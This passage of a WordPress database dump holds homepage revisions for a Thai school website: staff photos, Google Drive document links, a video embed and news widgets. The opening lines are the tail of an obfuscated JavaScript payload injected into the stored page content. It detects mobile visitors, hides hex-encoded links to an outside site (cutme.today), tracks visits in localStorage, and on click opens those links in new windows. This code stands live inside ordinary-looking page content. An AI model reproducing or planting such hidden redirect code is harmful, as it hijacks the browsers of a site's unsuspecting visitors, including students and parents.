)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 17:23:08','2025-07-15 10:23:08','',19,'http://watprato.ssk.in.th/?p=732',0,'revision','',0),
(733,1,'2025-07-15 17:26:30','2025-07-15 10:26:30','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 